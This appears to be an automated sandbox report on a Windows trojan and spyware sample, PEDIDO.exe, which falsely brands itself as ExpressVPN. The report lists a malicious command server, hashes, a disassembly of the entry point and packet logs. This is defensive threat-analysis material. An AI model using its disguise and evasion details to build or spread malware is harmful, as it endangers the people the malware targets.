                                IPDomainCountryFlagASNASN NameMalicious
                                172.217.168.46
                                drive.google.comUnited States
                                15169GOOGLEUSfalse
                                142.250.181.225
                                googlehosted.l.googleusercontent.comUnited States
                                15169GOOGLEUSfalse
                                188.93.227.195
                                tccinfaes.comPortugal
                                8426CLARANET-ASClaraNETLTDGBtrue

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:1664
                                Start date:14.10.2021
                                Start time:10:44:55
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 13m 1s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:PEDIDO.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                Run name:Suspected Instruction Hammering
                                Number of analysed new started processes analysed:22
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.spre.troj.spyw.evad.winEXE@10/3@4/3
                                EGA Information:Failed
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 97%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 20.82.207.122, 20.82.209.183, 92.123.195.73, 92.123.195.35, 8.248.117.254, 8.248.139.254, 67.27.157.126, 8.253.204.121, 8.248.145.254, 20.82.210.154, 104.89.32.83, 20.199.120.151, 104.89.41.209, 20.199.120.182, 209.197.3.8, 52.109.12.18, 20.199.120.85
                                • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, client.wns.windows.com, e8652.dscx.akamaiedge.net, wu-shim.trafficmanager.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, cds.d2s7q6s2.hwcdn.net, wdcp.microsoft.com, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, wd-prod-cp.trafficmanager.net, arc.msn.com, prod.nexusrules.live.com.akadns.net, wdcpalt.microsoft.com, wns.notify.trafficmanager.net, wildcard.weather.microsoft.com.edgekey.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, nexusrules.officeapps.live.com, crl.root-x1.letsencrypt.org.edgekey.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                10:47:34API Interceptor2707x Sleep call for process: RegAsm.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                188.93.227.195PEDIDO.exeGet hashmaliciousBrowse
                                  ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                    FACTURA.exeGet hashmaliciousBrowse
                                      Fra FAC-ES101-2107-03806.doc.exeGet hashmaliciousBrowse
                                        ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                          FAKTURA I PARAGONY.exeGet hashmaliciousBrowse
                                            COPIA DE PAGO.exeGet hashmaliciousBrowse
                                              orientite.exeGet hashmaliciousBrowse
                                                PO.exeGet hashmaliciousBrowse
                                                  DDC50015.exeGet hashmaliciousBrowse
                                                    Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                                      DHL00051021_PDF.exeGet hashmaliciousBrowse
                                                        FACTURA.exeGet hashmaliciousBrowse
                                                          FACTURA.exeGet hashmaliciousBrowse
                                                            seeds.exeGet hashmaliciousBrowse
                                                              Product LIsts.exeGet hashmaliciousBrowse
                                                                FACTURA Y ALBARANES_pdf.exeGet hashmaliciousBrowse
                                                                  Scan.exeGet hashmaliciousBrowse
                                                                    Ticari Hesap #U00d6zetiniz.exeGet hashmaliciousBrowse
                                                                      Struggleres5.exeGet hashmaliciousBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                        ASN

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        CLARANET-ASClaraNETLTDGB5NKkJ6URW0Get hashmaliciousBrowse
                                                                        • 81.171.235.254
                                                                        Mun376v3ZyGet hashmaliciousBrowse
                                                                        • 89.206.151.152
                                                                        6Vk012xoynGet hashmaliciousBrowse
                                                                        • 81.171.235.236
                                                                        PEDIDO.exeGet hashmaliciousBrowse
                                                                        • 188.93.227.195
                                                                        cLbBJb6vzOGet hashmaliciousBrowse
                                                                        • 138.249.57.174
                                                                        ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                                                        • 188.93.227.195
                                                                        FACTURA.exeGet hashmaliciousBrowse
                                                                        • 188.93.227.195
                                                                        Fra FAC-ES101-2107-03806.doc.exeGet hashmaliciousBrowse
                                                                        • 188.93.227.195
                                                                        ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                                                        • 188.93.227.195
                                                                        b3astmode.arm7Get hashmaliciousBrowse
                                                                        • 80.168.0.124
                                                                        jew.arm7Get hashmaliciousBrowse
                                                                        • 212.49.223.28
                                                                        sora.arm7Get hashmaliciousBrowse
                                                                        • 89.206.151.169
                                                                        FAKTURA I PARAGONY.exeGet hashmaliciousBrowse
                                                                        • 188.93.227.195
                                                                        COPIA DE PAGO.exeGet hashmaliciousBrowse
                                                                        • 188.93.227.195
                                                                        sora.armGet hashmaliciousBrowse
                                                                        • 195.102.64.245
                                                                        LSCtJ6YbhBGet hashmaliciousBrowse
                                                                        • 195.102.64.215
                                                                        orientite.exeGet hashmaliciousBrowse
                                                                        • 188.93.227.195
                                                                        PO.exeGet hashmaliciousBrowse
                                                                        • 188.93.227.195
                                                                        DDC50015.exeGet hashmaliciousBrowse
                                                                        • 188.93.227.195
                                                                        UnHAnaAW.x86Get hashmaliciousBrowse
                                                                        • 212.49.223.21

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        37f463bf4616ecd445d4a1937da06e19MYUNG IN QUotation request.docxGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        AP Remittance for ingrid.rome@aftral.com.htmlGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        MTSMEXP-30012021,pdf.exeGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        art-76929842.xlsGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        ATT24207.htmlGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        GR01DtRd0N.exeGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        correction HAWB.exeGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        Orden de compra M244545.exeGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        Purchase Order PO-1000837 from LAW TRANSPORT.htmlGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        Maj PO.exeGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        Contract and PI of 1500W.exeGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        WireAdviceCopy.htmlGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        Wire_Confirmation-Copy.htmlGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        #Ud83d#Udcde-youse.guia-644-46204-282109.htmGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        zq8o6y1z60.dllGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        Original Shipment Doc Ref 2853801324189923,PDF.exeGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        Gsdqz.dllGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        HUTWMrDhov.dllGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        0q3K4qJqQT.exeGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225
                                                                        PEDIDO.exeGet hashmaliciousBrowse
                                                                        • 172.217.168.46
                                                                        • 142.250.181.225

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1391
                                                                        Entropy (8bit):7.705940075877404
                                                                        Encrypted:false
                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview: 0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):192
                                                                        Entropy (8bit):2.755523122618336
                                                                        Encrypted:false
                                                                        SSDEEP:3:kkFklv01cMlXfllXlE/zMcArXNNX8RolJuRdyo1dlUKlGXJlDdt:kKTjl81OdNMa8Rdy+UKcXP
                                                                        MD5:240C5803FD8B708383CCED2908F7ED81
                                                                        SHA1:AC7AE0B5E7D78BE98C95E19D2CA9ED52CACD6677
                                                                        SHA-256:6D2D7E41F80CFEF882973A57D2CDFDBB8B41A55F5D790C2A4B5903244E172605
                                                                        SHA-512:57B265B7BEC44D3023F0886D897BD1B37D24A262A12AAEE0ABE4CEB2E03665655A578C4A2EC55006B5B8138DABF8D7DB674ECD02E3C98B0D5C2D3031B41B2868
                                                                        Malicious:false
                                                                        Preview: p...... .........Q .....(....................................................... ..........~...p...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".5.a.6.2.8.1.5.c.-.5.6.f."...
                                                                        \Device\ConDrv
                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):30
                                                                        Entropy (8bit):3.964735178725505
                                                                        Encrypted:false
                                                                        SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                        MD5:9F754B47B351EF0FC32527B541420595
                                                                        SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                        SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                        SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                        Malicious:false
                                                                        Preview: NordVPN directory not found!..

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):5.79980248716969
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:PEDIDO.exe
                                                                        File size:98304
                                                                        MD5:8bc016e5779262b772d16903af6e142c
                                                                        SHA1:5fa020fa3a63a481eff19fca06e11c424d346e9f
                                                                        SHA256:69a8e2fa9664dce4cb9ab2d1a2e7ba67bd0516b9e4c8608e9c246d614be3241f
                                                                        SHA512:75705b51a700371ab9211b81bf0e36aeae80825418a3e260c9b9e6610cb3f31833349b309ac88f6e67bf3f16a34d349802c617a25f9a52e8bcfb989bf7289a53
                                                                        SSDEEP:1536:tqD1R2xaclNLo4V4UQhH03JYVtKP2BlxS6pE5LD:tqPkNLo4VRQh8OKettS5L
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L...i..T.................@...0...............P....@........

                                                                        File Icon

                                                                        Icon Hash:69e1c892f664c884

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4012b4
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x5402F169 [Sun Aug 31 09:56:57 2014 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:3d3cd1bd8dcc611a5734bf41f4e1a6a6

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        push 004102ECh
                                                                        call 00007F8784739123h
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        xor byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        inc eax
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add ah, dl
                                                                        adc ah, byte ptr [edx+4B4D12BAh]
                                                                        cdq
                                                                        mov ecx, 444C7E8Ah
                                                                        in eax, dx
                                                                        in al, dx
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add dword ptr [eax], eax
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        inc ebp
                                                                        outsb
                                                                        insd
                                                                        jc 00007F878473919Dh
                                                                        xor dword ptr [eax], eax
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add bh, bh
                                                                        int3
                                                                        xor dword ptr [eax], eax
                                                                        cmp bl, ah
                                                                        sub al, BCh
                                                                        out dx, eax
                                                                        test al, D9h
                                                                        inc ebp
                                                                        inc ebx
                                                                        mov ah, 7Bh
                                                                        pop esp
                                                                        sub al, 9Bh
                                                                        mov byte ptr [ecx], al
                                                                        test dword ptr [eax+11E72ED8h], 8B481779h
                                                                        cmp bl, byte ptr [edi]
                                                                        ret
                                                                        nop
                                                                        dec ecx
                                                                        mov dword ptr [edx+33AD4F3Ah], ebx
                                                                        cdq
                                                                        iretw
                                                                        adc dword ptr [edi+00AA000Ch], esi
                                                                        pushad
                                                                        rcl dword ptr [ebx+00000000h], cl
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        lodsb
                                                                        in eax, dx
                                                                        add byte ptr [eax], al
                                                                        or ecx, dword ptr [ecx]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [esi], al
                                                                        add byte ptr [esi+65h], dl
                                                                        outsb
                                                                        je 00007F8784739197h
                                                                        jc 00007F8784739132h
                                                                        or eax, 51000601h
                                                                        jne 00007F8784739197h
                                                                        jc 00007F8784739197h
                                                                        jnc 00007F8784739132h
                                                                        sbb dword ptr [ecx], eax

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x13f040x28.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x1c32.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000xf0.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x132f80x14000False0.50859375data6.25990201424IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .data0x150000xcc40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x160000x1c320x2000False0.346435546875data3.68560912734IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        CUSTOM0x179340x2feMS Windows icon resource - 1 icon, 32x32, 16 colorsEnglishUnited States
                                                                        CUSTOM0x170760x8beMS Windows icon resource - 1 icon, 32x32, 8 bits/pixelEnglishUnited States
                                                                        CUSTOM0x16d780x2feMS Windows icon resource - 1 icon, 32x32, 16 colors, 4 bits/pixelEnglishUnited States
                                                                        RT_ICON0x164d00x8a8data
                                                                        RT_GROUP_ICON0x164bc0x14data
                                                                        RT_VERSION0x161a00x31cdataEnglishUnited States

                                                                        Imports

                                                                        DLLImport
                                                                        MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarAdd, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                                        Version Infos

                                                                        DescriptionData
                                                                        Translation0x0409 0x04b0
                                                                        LegalCopyrightExpressVPN
                                                                        InternalNameLurifaksernes
                                                                        FileVersion4.00
                                                                        CompanyNameExpressVPN
                                                                        LegalTrademarksExpressVPN
                                                                        CommentsExpressVPN
                                                                        ProductNameExpressVPN
                                                                        ProductVersion4.00
                                                                        FileDescriptionExpressVPN
                                                                        OriginalFilenameLurifaksernes.exe

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 14, 2021 10:47:22.804116011 CEST49795443192.168.11.20172.217.168.46
                                                                        Oct 14, 2021 10:47:22.804188967 CEST44349795172.217.168.46192.168.11.20
                                                                        Oct 14, 2021 10:47:22.804392099 CEST49795443192.168.11.20172.217.168.46
                                                                        Oct 14, 2021 10:47:22.823154926 CEST49795443192.168.11.20172.217.168.46
                                                                        Oct 14, 2021 10:47:22.823209047 CEST44349795172.217.168.46192.168.11.20
                                                                        Oct 14, 2021 10:47:22.880420923 CEST44349795172.217.168.46192.168.11.20
                                                                        Oct 14, 2021 10:47:22.880661011 CEST49795443192.168.11.20172.217.168.46
                                                                        Oct 14, 2021 10:47:22.882417917 CEST44349795172.217.168.46192.168.11.20
                                                                        Oct 14, 2021 10:47:22.882608891 CEST49795443192.168.11.20172.217.168.46
                                                                        Oct 14, 2021 10:47:22.997232914 CEST49795443192.168.11.20172.217.168.46
                                                                        Oct 14, 2021 10:47:22.997293949 CEST44349795172.217.168.46192.168.11.20
                                                                        Oct 14, 2021 10:47:22.998034000 CEST44349795172.217.168.46192.168.11.20
                                                                        Oct 14, 2021 10:47:22.998297930 CEST49795443192.168.11.20172.217.168.46
                                                                        Oct 14, 2021 10:47:23.003554106 CEST49795443192.168.11.20172.217.168.46
                                                                        Oct 14, 2021 10:47:23.045945883 CEST44349795172.217.168.46192.168.11.20
                                                                        Oct 14, 2021 10:47:23.368940115 CEST44349795172.217.168.46192.168.11.20
                                                                        Oct 14, 2021 10:47:23.369133949 CEST49795443192.168.11.20172.217.168.46
                                                                        Oct 14, 2021 10:47:23.369234085 CEST44349795172.217.168.46192.168.11.20
                                                                        Oct 14, 2021 10:47:23.369381905 CEST49795443192.168.11.20172.217.168.46
                                                                        Oct 14, 2021 10:47:23.369426012 CEST44349795172.217.168.46192.168.11.20
                                                                        Oct 14, 2021 10:47:23.369532108 CEST49795443192.168.11.20172.217.168.46
                                                                        Oct 14, 2021 10:47:23.369560957 CEST44349795172.217.168.46192.168.11.20
                                                                        Oct 14, 2021 10:47:23.369610071 CEST44349795172.217.168.46192.168.11.20
                                                                        Oct 14, 2021 10:47:23.369708061 CEST49795443192.168.11.20172.217.168.46
                                                                        Oct 14, 2021 10:47:23.369728088 CEST49795443192.168.11.20172.217.168.46
                                                                        Oct 14, 2021 10:47:23.426846981 CEST49795443192.168.11.20172.217.168.46
                                                                        Oct 14, 2021 10:47:23.426906109 CEST44349795172.217.168.46192.168.11.20
                                                                        Oct 14, 2021 10:47:23.507318974 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.507384062 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.507550001 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.507863045 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.507904053 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.561512947 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.561748981 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.564671040 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.564820051 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.564850092 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.568097115 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.568121910 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.568531036 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.568701982 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.568936110 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.610017061 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.816692114 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.816852093 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.816930056 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.817116976 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.817358017 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.817766905 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.817986965 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.819242001 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.819386959 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.819417000 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.819432020 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.819458961 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.819607019 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.819911957 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.820166111 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.820208073 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.820358992 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.826781034 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.826941013 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.826987028 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.827136040 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.827169895 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.827318907 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.827356100 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.827574968 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.827733994 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.827902079 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.827940941 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.828090906 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.828448057 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.828632116 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.828665972 CEST44349796142.250.181.225192.168.11.20
